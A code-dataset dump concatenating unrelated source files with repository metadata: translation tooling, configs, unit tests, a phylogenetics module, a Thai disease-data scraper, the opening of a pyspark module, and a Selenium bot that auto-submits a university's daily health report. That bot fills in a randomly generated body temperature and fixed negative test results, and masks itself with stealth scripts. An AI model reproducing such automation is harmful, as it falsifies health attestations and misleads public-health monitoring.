"MIT"
] | 2
|
2019-08-06T13:47:40.000Z
|
2020-05-06T21:57:31.000Z
|
contrib/devtools/update-translations.py
|
litex-dev/Litexcoin
|
9ddc29de3d76993edc43a72d6be6fb8c8b7adff8
|
[
"MIT"
] | null | null | null |
contrib/devtools/update-translations.py
|
litex-dev/Litexcoin
|
9ddc29de3d76993edc43a72d6be6fb8c8b7adff8
|
[
"MIT"
] | 3
|
2019-10-16T19:08:49.000Z
|
2020-05-08T01:16:11.000Z
|
#!/usr/bin/env python
# Copyright (c) 2014 Wladimir J. van der Laan
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
'''
Run this script from the root of the repository to update all translations from
transifex.
It will do the following automatically:
- fetch all translations using the tx tool
- post-process them into valid and committable format
- remove invalid control characters
- remove location tags (makes diffs less noisy)
TODO:
- auto-add new translations to the build system according to the translation process
'''
from __future__ import division, print_function
import subprocess
import re
import sys
import os
import io
import xml.etree.ElementTree as ET
# Name of transifex tool
TX = 'tx'
# Name of source language file
SOURCE_LANG = 'ltx_en.ts'
# Directory with locale files
LOCALE_DIR = 'src/qt/locale'
# Minimum number of messages for translation to be considered at all
MIN_NUM_MESSAGES = 10
def check_at_repository_root():
if not os.path.exists('.git'):
print('No .git directory found')
print('Execute this script at the root of the repository', file=sys.stderr)
exit(1)
def fetch_all_translations():
if subprocess.call([TX, 'pull', '-f', '-a']):
print('Error while fetching translations', file=sys.stderr)
exit(1)
def find_format_specifiers(s):
'''Find all format specifiers in a string.'''
pos = 0
specifiers = []
while True:
percent = s.find('%', pos)
if percent < 0:
break
try:
specifiers.append(s[percent+1])
except:
print('Failed to get specifier')
pos = percent+2
return specifiers
def split_format_specifiers(specifiers):
'''Split format specifiers between numeric (Qt) and others (strprintf)'''
numeric = []
other = []
for s in specifiers:
if s in {'1','2','3','4','5','6','7','8','9'}:
numeric.append(s)
else:
other.append(s)
# If both numeric format specifiers and "others" are used, assume we're dealing
# with a Qt-formatted message. In the case of Qt formatting (see https://doc.qt.io/qt-5/qstring.html#arg)
# only numeric formats are replaced at all. This means "(percentage: %1%)" is valid, without needing
# any kind of escaping that would be necessary for strprintf. Without this, this function
# would wrongly detect '%)' as a printf format specifier.
if numeric:
other = []
# numeric (Qt) can be present in any order, others (strprintf) must be in specified order
return set(numeric),other
def sanitize_string(s):
'''Sanitize string for printing'''
return s.replace('\n',' ')
def check_format_specifiers(source, translation, errors, numerus):
source_f = split_format_specifiers(find_format_specifiers(source))
# assert that no source messages contain both Qt and strprintf format specifiers
# if this fails, go change the source as this is hacky and confusing!
assert(not(source_f[0] and source_f[1]))
try:
translation_f = split_format_specifiers(find_format_specifiers(translation))
except IndexError:
errors.append("Parse error in translation for '%s': '%s'" % (sanitize_string(source), sanitize_string(translation)))
return False
else:
if source_f != translation_f:
if numerus and source_f == (set(), ['n']) and translation_f == (set(), []) and translation.find('%') == -1:
# Allow numerus translations to omit %n specifier (usually when it only has one possible value)
return True
errors.append("Mismatch between '%s' and '%s'" % (sanitize_string(source), sanitize_string(translation)))
return False
return True
def all_ts_files(suffix=''):
for filename in os.listdir(LOCALE_DIR):
# process only language files, and do not process source language
if not filename.endswith('.ts'+suffix) or filename == SOURCE_LANG+suffix:
continue
if suffix: # remove provided suffix
filename = filename[0:-len(suffix)]
filepath = os.path.join(LOCALE_DIR, filename)
yield(filename, filepath)
FIX_RE = re.compile(b'[\x00-\x09\x0b\x0c\x0e-\x1f]')
def remove_invalid_characters(s):
'''Remove invalid characters from translation string'''
return FIX_RE.sub(b'', s)
# Override cdata escape function to make our output match Qt's (optional, just for cleaner diffs for
# comparison, disable by default)
_orig_escape_cdata = None
def escape_cdata(text):
text = _orig_escape_cdata(text)
text = text.replace("'", ''')
text = text.replace('"', '"')
return text
def postprocess_translations(reduce_diff_hacks=False):
print('Checking and postprocessing...')
if reduce_diff_hacks:
global _orig_escape_cdata
_orig_escape_cdata = ET._escape_cdata
ET._escape_cdata = escape_cdata
for (filename,filepath) in all_ts_files():
os.rename(filepath, filepath+'.orig')
have_errors = False
for (filename,filepath) in all_ts_files('.orig'):
# pre-fixups to cope with transifex output
parser = ET.XMLParser(encoding='utf-8') # need to override encoding because 'utf8' is not understood only 'utf-8'
with open(filepath + '.orig', 'rb') as f:
data = f.read()
# remove control characters; this must be done over the entire file otherwise the XML parser will fail
data = remove_invalid_characters(data)
tree = ET.parse(io.BytesIO(data), parser=parser)
# iterate over all messages in file
root = tree.getroot()
for context in root.findall('context'):
for message in context.findall('message'):
numerus = message.get('numerus') == 'yes'
source = message.find('source').text
translation_node = message.find('translation')
# pick all numerusforms
if numerus:
translations = [i.text for i in translation_node.findall('numerusform')]
else:
translations = [translation_node.text]
for translation in translations:
if translation is None:
continue
errors = []
valid = check_format_specifiers(source, translation, errors, numerus)
for error in errors:
print('%s: %s' % (filename, error))
if not valid: # set type to unfinished and clear string if invalid
translation_node.clear()
translation_node.set('type', 'unfinished')
have_errors = True
# Remove location tags
for location in message.findall('location'):
message.remove(location)
# Remove entire message if it is an unfinished translation
if translation_node.get('type') == 'unfinished':
context.remove(message)
# check if document is (virtually) empty, and remove it if so
num_messages = 0
for context in root.findall('context'):
for message in context.findall('message'):
num_messages += 1
if num_messages < MIN_NUM_MESSAGES:
print('Removing %s, as it contains only %i messages' % (filepath, num_messages))
continue
# write fixed-up tree
# if diff reduction requested, replace some XML to 'sanitize' to qt formatting
if reduce_diff_hacks:
out = io.BytesIO()
tree.write(out, encoding='utf-8')
out = out.getvalue()
out = out.replace(b' />', b'/>')
with open(filepath, 'wb') as f:
f.write(out)
else:
tree.write(filepath, encoding='utf-8')
return have_errors
if __name__ == '__main__':
check_at_repository_root()
fetch_all_translations()
postprocess_translations()
| 38.616114
| 124
| 0.633775
|
ff93d470b1e0aa6f3095869d96cfb037be94fe75
| 1,978
|
py
|
Python
|
rllab/config.py
|
jackwilkinson255/mbmpo_master
|
e9e0eaf542c7895764dcb0bfee28752818124ff2
|
[
"MIT"
] | 28
|
2018-11-15T14:14:23.000Z
|
2022-01-10T01:53:43.000Z
|
rllab/config.py
|
hongzimao/model_ensemble_meta_learning
|
8b1351df94dfe530efaff1118022315c8d877774
|
[
"MIT"
] | 3
|
2019-05-05T23:39:01.000Z
|
2021-06-15T15:28:06.000Z
|
rllab/config.py
|
hongzimao/model_ensemble_meta_learning
|
8b1351df94dfe530efaff1118022315c8d877774
|
[
"MIT"
] | 14
|
2018-11-15T16:47:02.000Z
|
2021-05-28T14:58:01.000Z
|
import os.path as osp
import os
PROJECT_PATH = osp.abspath(osp.join(osp.dirname(__file__), '..'))
LOG_DIR = PROJECT_PATH + "/data"
USE_TF = False
DOCKER_IMAGE = "DOCKER_IMAGE"
DOCKERFILE_PATH = "/path/to/Dockerfile"
KUBE_PREFIX = "rllab_"
DOCKER_LOG_DIR = "/tmp/expt"
POD_DIR = PROJECT_PATH + "/.pods"
AWS_S3_PATH = None
AWS_IMAGE_ID = None
AWS_INSTANCE_TYPE = "m4.xlarge"
AWS_KEY_NAME = "AWS_KEY_NAME"
AWS_SPOT = True
AWS_SPOT_PRICE = '1.0'
AWS_ACCESS_KEY = os.environ.get("AWS_ACCESS_KEY", None)
AWS_ACCESS_SECRET = os.environ.get("AWS_ACCESS_SECRET", None)
AWS_IAM_INSTANCE_PROFILE_NAME = "rllab"
AWS_SECURITY_GROUPS = ["rllab"]
AWS_SECURITY_GROUP_IDS = []
AWS_NETWORK_INTERFACES = []
AWS_EXTRA_CONFIGS = dict()
AWS_REGION_NAME = "us-east-1"
CODE_SYNC_IGNORES = ["*.git/*", "*data/*", "*.pod/*"]
DOCKER_CODE_DIR = "/root/code/rllab"
AWS_CODE_SYNC_S3_PATH = "s3://to/be/overriden/in/personal"
# whether to use fast code sync
FAST_CODE_SYNC = True
FAST_CODE_SYNC_IGNORES = [".git", "data", ".pods"]
KUBE_DEFAULT_RESOURCES = {
"requests": {
"cpu": 0.8,
}
}
KUBE_DEFAULT_NODE_SELECTOR = {
"aws/type": "m4.xlarge",
}
MUJOCO_KEY_PATH = osp.expanduser("~/.mujoco")
# MUJOCO_KEY_PATH = osp.join(osp.dirname(__file__), "../vendor/mujoco")
MUJOCO_MODEL_PATH = osp.join(osp.dirname(__file__), "../vendor/mujoco_models")
ENV = {}
EBS_OPTIMIZED = True
if osp.exists(osp.join(osp.dirname(__file__), "config_personal.py")):
from .config_personal import *
else:
print("Creating your personal config from template...")
from shutil import copy
copy(osp.join(PROJECT_PATH, "rllab/config_personal_template.py"), osp.join(PROJECT_PATH, "rllab/config_personal.py"))
from .config_personal import *
print("Personal config created, but you should probably edit it before further experiments " \
"are run")
if 'CIRCLECI' not in os.environ:
print("Exiting.")
import sys; sys.exit(0)
LABEL = ""
| 21.736264
| 121
| 0.704247
|
aabd1c96726a91821d1e508d0192cad891c0d054
| 1,443
|
py
|
Python
|
clients/python/generated/test/test_inline_object2.py
|
ub1k24/swagger-aem
|
c9ae0cf8b57d27658527982d6d6653790d3acf80
|
[
"Apache-2.0"
] | 39
|
2016-10-02T06:45:12.000Z
|
2021-09-08T20:39:53.000Z
|
clients/python/generated/test/test_inline_object2.py
|
ub1k24/swagger-aem
|
c9ae0cf8b57d27658527982d6d6653790d3acf80
|
[
"Apache-2.0"
] | 35
|
2016-11-02T05:06:34.000Z
|
2021-09-03T06:03:08.000Z
|
clients/python/generated/test/test_inline_object2.py
|
ub1k24/swagger-aem
|
c9ae0cf8b57d27658527982d6d6653790d3acf80
|
[
"Apache-2.0"
] | 23
|
2016-11-07T04:14:42.000Z
|
2021-02-15T09:49:13.000Z
|
# coding: utf-8
"""
Adobe Experience Manager (AEM) API
Swagger AEM is an OpenAPI specification for Adobe Experience Manager (AEM) API # noqa: E501
The version of the OpenAPI document: 3.4.0-pre.0
Contact: opensource@shinesolutions.com
Generated by: https://openapi-generator.tech
"""
from __future__ import absolute_import
import unittest
import datetime
import swaggeraem
from swaggeraem.models.inline_object2 import InlineObject2 # noqa: E501
from swaggeraem.rest import ApiException
class TestInlineObject2(unittest.TestCase):
"""InlineObject2 unit test stubs"""
def setUp(self):
pass
def tearDown(self):
pass
def make_instance(self, include_optional):
"""Test InlineObject2
include_option is a boolean, when False only required
params are included, when True both required and
optional params are included """
# model = swaggeraem.models.inline_object2.InlineObject2() # noqa: E501
if include_optional :
return InlineObject2(
certificate = bytes(b'blah')
)
else :
return InlineObject2(
)
def testInlineObject2(self):
"""Test InlineObject2"""
inst_req_only = self.make_instance(include_optional=False)
inst_req_and_optional = self.make_instance(include_optional=True)
if __name__ == '__main__':
unittest.main()
| 26.722222
| 96
| 0.67429
|
d4097900d3898f5f10b17f62888eca6963bb958a
| 1,676
|
py
|
Python
|
exabel_data_sdk/tests/client/api/test_entity_api.py
|
aksestok/python-sdk
|
520a3d9822ffa9a023262b379ea3b3d19cb10853
|
[
"MIT"
] | null | null | null |
exabel_data_sdk/tests/client/api/test_entity_api.py
|
aksestok/python-sdk
|
520a3d9822ffa9a023262b379ea3b3d19cb10853
|
[
"MIT"
] | null | null | null |
exabel_data_sdk/tests/client/api/test_entity_api.py
|
aksestok/python-sdk
|
520a3d9822ffa9a023262b379ea3b3d19cb10853
|
[
"MIT"
] | null | null | null |
import unittest
from exabel_data_sdk.client.api.data_classes.entity import Entity
from exabel_data_sdk.client.api.entity_api import EntityApi
from exabel_data_sdk.tests.client.api.mock_entity_api import MockEntityApi
class TestEntityApi(unittest.TestCase):
def test_upsert(self):
for assume_exists in (True, False):
entity_api: EntityApi = MockEntityApi()
expected = Entity(
name="entityTypes/company/entities/Amazon",
display_name="Amazon",
)
created_entity = entity_api.upsert_entity(expected, assume_exists)
self.assertEqual(expected, created_entity)
updated_entity = entity_api.upsert_entity(expected, assume_exists)
self.assertEqual(expected, updated_entity)
def test_upsert_replaces_resource(self):
for assume_exists in (True, False):
entity_api: EntityApi = MockEntityApi()
old_entity = Entity(
name="entityTypes/company/entities/Amazon",
display_name="Amazon's old display name",
description="Amazon's old description",
properties={"old_property": "old_value"},
)
expected = Entity(
name="entityTypes/company/entities/Amazon",
display_name="Amazon",
description="Amazon's new description",
)
entity_api.create_entity(old_entity, old_entity.get_entity_type())
entity_api.upsert_entity(expected, assume_exists)
actual_entity = entity_api.get_entity(expected.name)
self.assertEqual(expected, actual_entity)
| 42.974359
| 78
| 0.648568
|
b902705c8f6e93393788099063b26598ccbb0c02
| 5,742
|
py
|
Python
|
main.py
|
incredible-smurf/xjtu_healthy_for_graduates
|
3c09d9626b01ef97a7146d5649e58b024a6bea25
|
[
"MIT"
] | null | null | null |
main.py
|
incredible-smurf/xjtu_healthy_for_graduates
|
3c09d9626b01ef97a7146d5649e58b024a6bea25
|
[
"MIT"
] | null | null | null |
main.py
|
incredible-smurf/xjtu_healthy_for_graduates
|
3c09d9626b01ef97a7146d5649e58b024a6bea25
|
[
"MIT"
] | null | null | null |
#coding=utf-8
import logging
import os
import random
import time
from dotenv import load_dotenv
from selenium import webdriver
from selenium.common.exceptions import NoSuchElementException
from selenium.webdriver.common.by import By
from selenium.webdriver.common.keys import Keys
from selenium.webdriver.support import expected_conditions as EC
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.common.action_chains import ActionChains
load_dotenv()
logging.basicConfig(level=logging.INFO)
logger = logging.getLogger(__name__)
def wait_for_ajax(driver):
wait = WebDriverWait(driver, 15)
try:
wait.until(lambda driver: driver.execute_script('return jQuery.active') == 0)
wait.until(lambda driver: driver.execute_script('return document.readyState') == 'complete')
except Exception as e:
pass
def main():
netid = os.getenv("netid")
password = os.getenv("password")
options = webdriver.ChromeOptions()
options.headless = True
options.add_argument("--window-size=1920,1080")
options.add_argument('user-agent=Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36')
with open('./stealth.min.js') as f:
js = f.read()
#options.add_experimental_option("debuggerAddress", "127.0.0.1:9222")
driver = webdriver.Chrome(options=options)
driver.execute_cdp_cmd("Page.addScriptToEvaluateOnNewDocument", {"source": js})
driver.get("http://jkrb.xjtu.edu.cn/EIP/user/index.htm")
wait = WebDriverWait(driver=driver, timeout=30)
wait.until((EC.url_contains("org.xjtu.edu.cn")))
elem = wait.until(
EC.presence_of_element_located((By.XPATH, '//*[@id="form1"]/input[1]'))
)
elem.send_keys(netid)
elem = wait.until(
EC.presence_of_element_located((By.XPATH, '//*[@id="form1"]/input[2]'))
)
elem.send_keys(password)
elem.send_keys(Keys.ENTER)
try:
wait.until(EC.url_contains("http://jkrb.xjtu.edu.cn/EIP/user/index.htm"))
except Exception:
logger.info("nothing")
logger.info("Successful Login")
wait_for_ajax(driver)
iframe = driver.find_element_by_xpath("//iframe[@onload='__iframe_onload2()']")
driver.switch_to.frame(iframe)
iframe = driver.find_element_by_xpath("//iframe[@onload='__iframe_onload1()']")
driver.switch_to.frame(iframe)
iframe=driver.find_element_by_xpath('//div[@title="研究生每日健康状况填报"]')
iframe.click()
driver.implicitly_wait(1)
driver.switch_to.default_content()
driver.implicitly_wait(5)
iframe = driver.find_element_by_xpath(
"//iframe[@onload='__iframe_onload3()']")
driver.switch_to.frame(iframe)
iframe= driver.find_element_by_xpath(r'//li[@data-blname="每日健康填报"]')
iframe.click()
driver.implicitly_wait(1)
driver.switch_to.default_content()
driver.implicitly_wait(5)
try :
iframe = driver.find_element_by_xpath("//iframe[@onload='__iframe_onload4()']")
driver.switch_to.frame(iframe)
iframe = driver.find_element_by_xpath("//iframe[@onload='__iframe_onload1()']")
driver.switch_to.frame(iframe)
temp = str(round(36 + random.random(), 1))
driver.find_element_by_xpath(
'//*[@id="BRTW$text"]'
).send_keys(temp)
print('st 确认须知')
driver.find_element_by_xpath('//*[@id="mini-2$ck$0"and @value="1"]').click()
#确认须知
#日期
date = time.localtime(time.time()-8*3600)
send_date = str(date.tm_year)+'-'+str(date.tm_mon)+'-'+str(date.tm_mday)+" 13:31"
data_input = driver.find_element_by_xpath('//*[@id="ZJYCHSJCSJ$text"]')
time.sleep(5)
data_input.clear()
data_input.send_keys(send_date)
driver.find_element_by_xpath('//*[@id="mini-4$ck$0" and @value="是"]').click()
time.sleep(random.uniform(1,2))
driver.find_element_by_xpath('//*[@id="mini-9$ck$1" and @value="阴性"]').click()
time.sleep(random.uniform(1,2))
driver.find_element_by_xpath('//*[@id="mini-10$ck$0" and @value="未被隔离"]').click()
time.sleep(random.uniform(1,2))
driver.find_element_by_xpath('//*[@id="mini-11$ck$2" and @value="绿色"]').click()
time.sleep(random.uniform(1,2))
logger.info(f"Today's body temp. is {temp}")
driver.switch_to.default_content()
driver.implicitly_wait(5)
iframe = driver.find_element_by_xpath("//iframe[@onload='__iframe_onload4()']")
driver.implicitly_wait(5)
driver.switch_to.frame(iframe)
submit=driver.find_element_by_xpath('//*[@id="sendBtn"]')
submit.click()
driver.implicitly_wait(5)
submit=driver.find_element_by_xpath('//*[@id="mini-17"]/span')
submit.click()
try:
driver.switch_to.default_content()
driver.implicitly_wait(1)
iframe = driver.find_element_by_xpath(
"//iframe[@onload='__iframe_onload4()']"
)
driver.switch_to.frame(iframe)
elem = driver.find_element_by_xpath("//*[@id='mini-19$content']")
logger.info(elem.text)
except NoSuchElementException:
logger.info("Successful submit!")
except NoSuchElementException:
driver.switch_to.default_content()
iframe = driver.find_element_by_xpath("//iframe[@onload='__iframe_onload5()']")
driver.switch_to.frame(iframe)
elem = driver.find_element_by_xpath("//*[@id='messageId']")
logger.info("You've already checked in.")
logger.info(elem.text)
if __name__ == "__main__":
main()
| 34.590361
| 160
| 0.653605
|
3ee91d056507eea2b793da59df8f6109f0e43d79
| 3,949
|
py
|
Python
|
uh.collegescheduler.com/corecurriculum/sectionattributes/src/sectionattributes.py
|
cougargrades/json
|
42f0c46f8c69a2c7f8c531775f744a782ae825a8
|
[
"MIT"
] | null | null | null |
uh.collegescheduler.com/corecurriculum/sectionattributes/src/sectionattributes.py
|
cougargrades/json
|
42f0c46f8c69a2c7f8c531775f744a782ae825a8
|
[
"MIT"
] | null | null | null |
uh.collegescheduler.com/corecurriculum/sectionattributes/src/sectionattributes.py
|
cougargrades/json
|
42f0c46f8c69a2c7f8c531775f744a782ae825a8
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
import argparse
import requests
import json
from halo import Halo
parser = argparse.ArgumentParser(description='Scrapes UH CollegeScheduler API to enumerate all courses by section attributes.')
parser.add_argument('apiUrl', metavar='API_URL', type=str,
help='The API URL used. No trailing slash. Ex: http://uh.collegescheduler.com')
args = parser.parse_args()
HOST = args.apiUrl
catalog_data = {}
try:
spinner = Halo(text=f'Testing API access', spinner='dots')
spinner.start()
res = requests.get(f'{HOST}/api/terms')
if res.status_code == 200 and 'studentCareers' in res.json()[0].keys():
spinner.succeed(text=f'API access confirmed')
else:
spinner.fail(text=f'API access failed')
except Exception as err:
spinner.fail(text=f'API access failed with an Exception: {err}')
try:
spinner = Halo(text=f'Enumerating available terms', spinner='dots')
spinner.start()
res = requests.get(f'{HOST}/api/terms')
catalog_data["terms"] = [x["id"] for x in res.json()]
spinner.succeed()
print(f'\t{catalog_data["terms"]}')
except Exception as err:
spinner.fail()
print(err)
try:
spinner = Halo(text=f'Enumerating section attributes', spinner='dots')
spinnertxt = spinner.text
n = 0
spinner.start()
catalog_data["sectionAttributes"] = []
# for every term currently accessible
for term in catalog_data["terms"]:
res = requests.get(f'{HOST}/api/terms/{term}/sectionattributes')
# for every attribute
catalog_data["sectionAttributes"] += [{ "id": x["id"], "title": x["attrTitle"] } for x in res.json()]
deduped = []
for i in catalog_data["sectionAttributes"]:
if i not in deduped:
deduped.append(i)
catalog_data["sectionAttributes"] = deduped
spinner.succeed()
print(f'\t{[x["id"] for x in catalog_data["sectionAttributes"]]}')
except Exception as err:
spinner.fail()
print(err)
try:
spinner = Halo(text=f'Computing total course count', spinner='dots')
spinner.start()
# for every term currently accessible
total = 0
for term in catalog_data["terms"]:
res = requests.get(f'{HOST}/api/terms/{term}/courses')
total += len(res.json())
spinner.succeed(f'{total} total courses found from accessible terms.')
except Exception as err:
spinner.fail()
print(err)
try:
spinner = Halo(text=f'Enumerating courses by subject, by section attributes, by term', spinner='dots')
spinnertxt = spinner.text
n = 0
spinner.start()
# for every term currently accessible
for term in catalog_data["terms"]:
res = requests.get(f'{HOST}/api/terms/{term}/sectionattributes')
# for every attribute
attributes = [x["id"] for x in res.json()]
for attr in attributes:
res = requests.get(f'{HOST}/api/terms/{term}/sectionattributevalues/{attr}/subjects')
attributed_courses = []
subjects = [x["id"] for x in res.json()]
# for every subject
for sub in subjects:
res = requests.get(f'{HOST}/api/terms/{term}/sectionattributevalues/{attr}/subjects/{sub}/courses')
courses = [x for x in res.json()]
for item in courses:
item["sectionAttribute"] = attr
spinner.text = f'{spinnertxt}: {n} courses observed, generating `{term} {attr}.jsonl`'
n += 1
attributed_courses += courses
with open(f'{term} {attr}.jsonl', 'w') as f:
for item in attributed_courses:
f.write(f'{json.dumps(item)}\n')
spinner.succeed()
print(f'Files were written')
except Exception as err:
spinner.fail()
print(err)
# write manifest.json
with open(f'manifest.json', 'w') as f:
f.write(f'{json.dumps(catalog_data, indent=4, sort_keys=True)}\n')
| 35.258929
| 127
| 0.62902
|
a01efdf105fb89ca1c8a5c32a5f43d981fbba61d
| 3,372
|
py
|
Python
|
src/cogent3/phylo/least_squares.py
|
rahulghangas/cogent3
|
f00cf822efce5f3141b3c7dafac81cb94a311e22
|
[
"BSD-3-Clause"
] | null | null | null |
src/cogent3/phylo/least_squares.py
|
rahulghangas/cogent3
|
f00cf822efce5f3141b3c7dafac81cb94a311e22
|
[
"BSD-3-Clause"
] | null | null | null |
src/cogent3/phylo/least_squares.py
|
rahulghangas/cogent3
|
f00cf822efce5f3141b3c7dafac81cb94a311e22
|
[
"BSD-3-Clause"
] | null | null | null |
#!/usr/bin/env python
import numpy
from numpy.linalg import solve as solve_linear_equations
from .tree_space import TreeEvaluator, ancestry2tree
from .util import (
distance_dict_and_names_to_1D,
distance_dict_to_1D,
triangular_order,
)
__author__ = "Peter Maxwell"
__copyright__ = "Copyright 2007-2019, The Cogent Project"
__credits__ = ["Peter Maxwell", "Gavin Huttley"]
__license__ = "BSD-3"
__version__ = "2019.9.13a"
__maintainer__ = "Peter Maxwell"
__email__ = "pm67nz@gmail.com"
__status__ = "Production"
# This is a fairly slow implementation and NOT suitable for large trees.
# Trees are represented as "ancestry" matricies in which A[i,j] iff j is an
# ancestor of i. For the LS calculations the ancestry matrix is converted
# to a "paths" matrix or "split metric" in which S[p,j] iff the path between
# the pth pair of tips passes through edge j.
def _ancestry2paths(A):
"""Convert edge x edge ancestry matrix to tip-to-tip path x edge
split metric matrix. The paths will be in the same triangular matrix order
as produced by distance_dict_and_names_to_1D, provided that the tips appear in
the correct order in A"""
tips = [i for i in range(A.shape[0]) if sum(A[:, i]) == 1]
paths = []
for (tip1, tip2) in triangular_order(tips):
path = A[tip1] ^ A[tip2]
paths.append(path)
return numpy.array(paths)
class WLS(TreeEvaluator):
"""(err, best_tree) = WLS(dists).trex()"""
def __init__(self, dists, weights=None):
"""Arguments:
- dists: a dict with structure (seq1, seq2): distance
- weights: an equivalently structured dict with measurements of
variability of the distance estimates. By default, the sqrt of
distance is used."""
try:
dists = dists.to_dict()
except AttributeError:
pass
self.dists = dists
self.weights = weights or dict(
(key, 1.0 / (self.dists[key] ** 2)) for key in self.dists
)
(self.names, dists) = distance_dict_to_1D(self.dists)
def make_tree_scorer(self, names):
dists = distance_dict_and_names_to_1D(self.dists, names)
weights = distance_dict_and_names_to_1D(self.weights, names)
# dists and weights are 1D forms of triangular tip x tip matrices
# The order of the tip-to-tip paths is the same for dists, weights and
# A
weights_dists = weights * dists
def evaluate(
ancestry,
lengths=None,
sum=sum,
_ancestry2paths=_ancestry2paths,
dot=numpy.dot,
maximum=numpy.maximum,
transpose=numpy.transpose,
solve=solve_linear_equations,
):
A = _ancestry2paths(ancestry)
if lengths is None:
At = transpose(A)
X = dot(weights * At, A)
y = dot(At, weights_dists)
lengths = solve(X, y)
lengths = maximum(lengths, 0.0)
diffs = dot(A, lengths) - dists
err = sum(diffs ** 2)
return (err, lengths)
return evaluate
def result2output(self, err, ancestry, lengths, names):
return (err, ancestry2tree(ancestry, lengths, names))
def wls(*args, **kw):
(err, tree) = WLS(*args).trex(**kw)
return tree
| 33.386139
| 82
| 0.628114
|
066fbe5b26bae836883f037e60b9232393167605
| 3,159
|
py
|
Python
|
src/data/download/TH_disease.py
|
juliazam/healthcare_ASEAN
|
3cc451f723124f18b2d11c79ff80a6c5a9354c6e
|
[
"MIT"
] | 25
|
2016-04-24T14:00:36.000Z
|
2021-01-07T07:26:00.000Z
|
src/data/download/TH_disease.py
|
shikhakhanna19/healthcare_ASEAN
|
3f89ec67fde825bf3b6275cee0e8f13812533c1e
|
[
"MIT"
] | 25
|
2016-06-24T07:04:39.000Z
|
2020-10-03T23:01:41.000Z
|
src/data/download/TH_disease.py
|
shikhakhanna19/healthcare_ASEAN
|
3f89ec67fde825bf3b6275cee0e8f13812533c1e
|
[
"MIT"
] | 112
|
2016-06-24T01:41:00.000Z
|
2020-10-03T00:33:22.000Z
|
# -*- coding: utf-8 -*-
"""Download historical RTF data from Thailand's Bureau of Epidemiology."""
from bs4 import BeautifulSoup
import re
import sys
import os
import logging
import requests
BASE_URL = 'http://www.boe.moph.go.th/boedb/surdata'
PAGE_URL = BASE_URL + '/disease.php?dcontent=old&ds={}'
DISEASE_CODES = {'Malaria': 30, 'Dengue Fever': 66}
DATA_DIR = os.path.join(os.path.abspath(__file__ + '/../../../..'), 'data/raw')
logger = logging.getLogger()
logger.addHandler(logging.NullHandler())
def log_url(r, *args, **kwargs):
logger.info('Downloading %s', r.url)
def scrape_links(url):
"""Download all .rtf files linked from the given url."""
response = requests.get(url)
response.raise_for_status()
logger.info('Scraping links in %s', url)
soup = BeautifulSoup(response.content, 'html.parser')
return soup.find_all(href=re.compile('.rtf'))
def format_raw_data_path(disease_subfolder, link):
data_subfolder = link.parent.parent.find('font').contents[0].strip('()')
file_name = link.contents[0]
dir_path = os.path.join(DATA_DIR, disease_subfolder, data_subfolder)
os.makedirs(dir_path, exist_ok=True)
return os.path.join(dir_path, '%s.rtf' % (file_name))
def download_file(download_url):
# Request will be redirected unless the HTTP referer is the original host
headers = {'Referer': BASE_URL}
response = requests.get(download_url, headers=headers,
hooks=dict(response=log_url))
response.raise_for_status()
return response
def download():
# Overwrite the INFO logging level inherited from the root logger
logging.getLogger('requests').setLevel(logging.ERROR)
for (name, dc) in DISEASE_CODES.items():
logger.info('Downloading files for %s', name)
try:
links = scrape_links(PAGE_URL.format(dc))
except requests.exceptions.RequestException as e:
logger.critical('Failed to GET the Bureau of Epidemiology\'s site')
sys.exit(1)
for index, link in enumerate(links):
disease_subfolder = name.lower() + "_TH"
file_path = format_raw_data_path(disease_subfolder, link)
data_url = BASE_URL + '/' + link['href']
try:
raw_data = download_file(data_url)
except requests.exceptions.RequestException as e:
if e.response.status_code == 404:
logger.info('Failed to download %s since file was not found \
on server with HTTP status code 404', e.response.url)
continue
logger.exception(
'Failed to download %s with HTTP status code %i',
e.response.url, e.response.status_code
)
continue
logger.debug("Writing to %s", file_path)
with open(file_path, 'wb') as data_file:
data_file.write(raw_data.content)
else:
logger.info('Finished downloading files for %s', name)
if __name__ == '__main__':
import logging.config
logging.config.fileConfig('logconf.ini')
download()
| 35.1
| 81
| 0.63881
|
385a2439e27e28a49e8e1c7d19541ab9545dadac
| 16,937
|
py
|
Python
|
python/pyspark/ml/wrapper.py
|
yangwwei/spark
|
dc153f525c8c895b9ceac8dfb3516b601c86a462
|
[
"BSD-2-Clause",
"Apache-2.0",
"CC0-1.0",
"MIT",
"MIT-0",
"ECL-2.0",
"BSD-3-Clause-No-Nuclear-License-2014",
"BSD-3-Clause"
] | 1
|
2022-02-15T04:39:56.000Z
|
2022-02-15T04:39:56.000Z
|
python/pyspark/ml/wrapper.py
|
yangwwei/spark
|
dc153f525c8c895b9ceac8dfb3516b601c86a462
|
[
"BSD-2-Clause",
"Apache-2.0",
"CC0-1.0",
"MIT",
"MIT-0",
"ECL-2.0",
"BSD-3-Clause-No-Nuclear-License-2014",
"BSD-3-Clause"
] | 3
|
2022-01-21T23:55:04.000Z
|
2022-02-24T20:00:18.000Z
|
python/pyspark/ml/wrapper.py
|
yangwwei/spark
|
dc153f525c8c895b9ceac8dfb3516b601c86a462
|
[
"BSD-2-Clause",
"Apache-2.0",
"CC0-1.0",
"MIT",
"MIT-0",
"ECL-2.0",
"BSD-3-Clause-No-Nuclear-License-2014",
"BSD-3-Clause"
] | 1
|
2022-03-09T08:50:07.000Z
|
2022-03-09T08:50:07.000Z
|
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from abc import ABCMeta, abstractmethod
from typing import Any, Generic, Optional, List, Type, TypeVar, TYPE_CHECKING
from pyspark import since
from pyspark import SparkContext
from pyspark.sql import DataFrame
from pyspark.ml import Estimator, Predictor, PredictionModel, Transformer, Model
from pyspark.ml.base import _PredictorParams
from pyspark.ml.param import Param, Params
from pyspark.ml.util import _jvm # type: ignore[attr-defined]
